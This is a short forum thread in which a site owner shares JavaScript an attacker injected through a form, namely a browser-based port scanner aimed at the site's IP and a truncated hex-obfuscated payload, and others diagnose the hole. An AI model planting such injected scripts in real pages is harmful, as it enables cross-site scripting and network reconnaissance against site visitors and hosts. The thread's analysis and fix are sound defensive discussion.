Jump to content

Attacker


djp1988
 Share

Recommended Posts

Hi everyone, I had some smart arse trying to get some info from my site by posting javascript in a form, thought you guys may be interested in having a look:

<script>function scanPort(callback,target, port, timeout){ var timeout = (timeout == null)?100:timeout; var img = new Image();  img.onerror = function () {  if (!img) return;  img = undefined;  callback(target, port, 'open'); };  img.onload = img.onerror; img.src = 'http://' + target + ':' + port;  setTimeout(function () {  if (!img) return;  img = undefined;  callback(target, port, 'closed'); }, timeout);};function record(ip,port,open){alert(ip+':'+port+' is '+open);}function scan(ip,portfrom,portto,timeout){for (i=portfrom;i=portto;i++){scanPort(record(),ip,i,timeout);}}scan('0.0.0.0',1,80,200);</script>

the 0.0.0.0 was the site's ipthe same person opened another account and inserted the following in a javascript tag:

\x50\x20\x64\x3D\x5B\x22\x5C\x6B\x5C\x65\x5C\x68\x5C\x66\x22\x2C\x22\x5C\x65\x5C\x6B\x5C\x63\x5C\x67\x22\x2C\x22\x5C\x78\x5C\x65\x5C\x67\x5C\x66\x5C\x63\x5C\x67\x5C\x66\x5C\x71\x5C\x66\x5C\x7A\x5C\x6B\x5C\x63\x22\x2C\x22\x5C\x69\x5C\x6B\x5C\x6B\x5C\x72\x5C\x73\x5C\x6F\x5C\x69\x5C\x66\x5C\x73\x5C\x65\x5C\x67\x5C\x79\x5C\x51\x5C\x71\x5C\x6D\x5C\x6D\x5C\x6D\x5C\x71\x5C\x44\x5C\x65\x5C\x6A\x5C\x74\x5C\x71\x5C\x75\x5C\x6A\x5C\x72\x5C\x63\x5C\x67\x5C\x6F\x5C\x65\x5C\x6C\x5C\x63\x5C\x6C\x5C\x52\x5C\x53\x5C\x6F\x5C\x6E\x5C\x69\x5C\x6A\x5C\x68\x5C\x63\x5C\x66\x5C\x76\x5C\x45\x5C\x46\x5C\x54\x5C\x71\x5C\x55\x22\x2C\x22\x5C\x68\x5C\x63\x5C\x66\x5C\x47\x5C\x63\x5C\x56\x5C\x75\x5C\x63\x5C\x68\x5C\x66\x5C\x57\x5C\x63\x5C\x69\x5C\x6C\x5C\x63\x5C\x6A\x22\x2C\x22\x5C\x78\x5C\x65\x5C\x67\x5C\x66\x5C\x63\x5C\x67\x5C\x66\x5C\x71\x5C\x72\x5C\x63\x5C\x67\x5C\x77\x5C\x66\x5C\x6E\x22\x2C\x22\x5C\x72\x5C\x6

Edited by djp
Link to comment
Share on other sites

The "hacker" is just trying to scare you.The first script does nothing but go opening alert boxes that say "0.0.0.0:1 is open"By the way, he made a mistake here and executed a function rather than reference it:scanPort(record(),ip,i,timeoutThe second thing you're showing doesn't actually do anything at all, it's just a series of random characters that might slightly resemble some form of JSON.Are you allowing people to post Javascript on your page?

Link to comment
Share on other sites

It would appear so yes :)I've gone through this and disabled it now, I made these scripts a few years ago... since, I've been doing different projects and haven't really had time to go back and redo and improve older projects.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...